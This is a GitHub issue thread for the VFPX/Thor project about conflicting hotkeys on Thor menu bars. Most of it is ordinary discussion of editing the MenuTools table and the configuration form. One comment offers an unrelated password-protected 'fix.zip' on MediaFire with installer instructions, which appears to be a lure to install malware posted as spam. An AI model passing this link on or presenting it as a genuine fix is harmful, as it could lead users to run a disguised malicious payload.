### ISSUE TITLE
Hotkeys for Thor Menu Bars

### ISSUE THREAD

**Issue by billand88** [VFPX/Thor#264]
Well let's see....

For the What's New menu bar, take the "T" in Thor as your hotkey for that bar.
Change VFPX...hot key to the "X" (It clashes with Videos)
Take the "H" in Project Home Pages
Take the "w" in Framework as the hotkey...

...And I think you're good to go.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jimrnelson** [comment]
See my comment i #263

**Comment by billand88** [comment]
Well, after much too much searching, I can open the MenuTools table, fix the prompt for ID #6  - that conflicts with ID # 398 - and change it from a V hot key to an X hot key...but it works. That's one example...

**Comment by Jimrnelson** [comment]
You can do that from within the Thor Configuration form.  No need to open the table manually.  Sent from my iPhoneOn Aug 26, 2024, at 12:57 PM, billand88 ***@***.***> wrote:﻿
Well, after much too much searching, I can open the MenuTools table, fix the prompt for ID #6  - that conflicts with ID # 398 - and change it from a V hot key to an X hot key...but it works. That's one example...

**Comment by billand88** [comment]
Well, at the risk of being dumb, I don't see it. I don't see the ability to manipulate the VFPX Home Page menu bar (as an example) from the Thor Configuration Menu.

The closest I can come is the attached screen shot. Note that there's nothing underneath Thor / Thor Tools, but I could go to town on the IDE Tools menu bars.
![Screenshot 2024-08-26 210921](https://github.com/user-attachments/assets/01f31213-4e2f-4d9a-8fbc-43fcd9af150e)

**Comment by Jimrnelson** [comment]
Bill --

You're not the one feeling dumb here.  I did not check the config screen before suggesting it.
